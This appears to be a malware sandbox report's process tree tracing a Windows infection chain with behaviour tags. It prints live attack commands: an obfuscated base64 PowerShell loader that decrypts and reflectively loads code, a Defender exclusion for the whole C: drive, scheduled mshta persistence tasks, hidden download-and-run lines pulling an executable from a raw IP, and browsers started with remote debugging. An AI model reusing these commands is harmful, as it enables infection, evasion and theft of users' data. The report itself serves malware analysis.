C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"7⤵
- System Location Discovery: System Language Discovery
PID:5776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe"C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe"9⤵PID:17928
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369870101\e214b0379a.exe"C:\Users\Admin\AppData\Local\Temp\10369870101\e214b0379a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1680 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn lnwcPmaKYGY /tr "mshta C:\Users\Admin\AppData\Local\Temp\IFCVF05tj.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:1064 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn lnwcPmaKYGY /tr "mshta C:\Users\Admin\AppData\Local\Temp\IFCVF05tj.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5860
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\IFCVF05tj.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1920 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3336 -
C:\Users\Admin\AppData\Local\TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE"C:\Users\Admin\AppData\Local\TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1224
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369880121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:3624 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2500
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:3888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:60 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:4072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "C1xj5mazDuO" /tr "mshta \"C:\Temp\G8DAFiuhw.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1104
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\G8DAFiuhw.hta"7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:5820 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4112
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10369910101\6lV7WRt.exe"C:\Users\Admin\AppData\Local\Temp\10369910101\6lV7WRt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2296 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4676
-
-
-
C:\Users\Admin\AppData\Local\Temp\10370040101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10370040101\amnew.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"7⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:888 -
C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4712
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4612 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4320 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd8c5dcf8,0x7fffd8c5dd04,0x7fffd8c5dd1011⤵PID:6120
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1980 /prefetch:211⤵PID:4304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2160,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2192 /prefetch:311⤵PID:2608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2364 /prefetch:811⤵PID:6044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3232 /prefetch:111⤵
- Uses browser remote debugging
PID:3988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3288 /prefetch:111⤵
- Uses browser remote debugging
PID:1996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4300 /prefetch:211⤵
- Uses browser remote debugging
PID:212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4656 /prefetch:111⤵
- Uses browser remote debugging
PID:5004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5360 /prefetch:811⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5408,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5448 /prefetch:811⤵PID:4952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5684,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5456 /prefetch:811⤵PID:1212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5496,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5536 /prefetch:811⤵PID:3308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5844,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5852 /prefetch:811⤵PID:532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5412,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5840 /prefetch:811⤵PID:4796
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:1208 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x268,0x7fffd803f208,0x7fffd803f214,0x7fffd803f22011⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1956,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:311⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2228,i,10274489695290603505,9395938152506131302,262144 --variations-seed-version --mojo-platform-channel-handle=2224 /prefetch:211⤵PID:1040
-
-
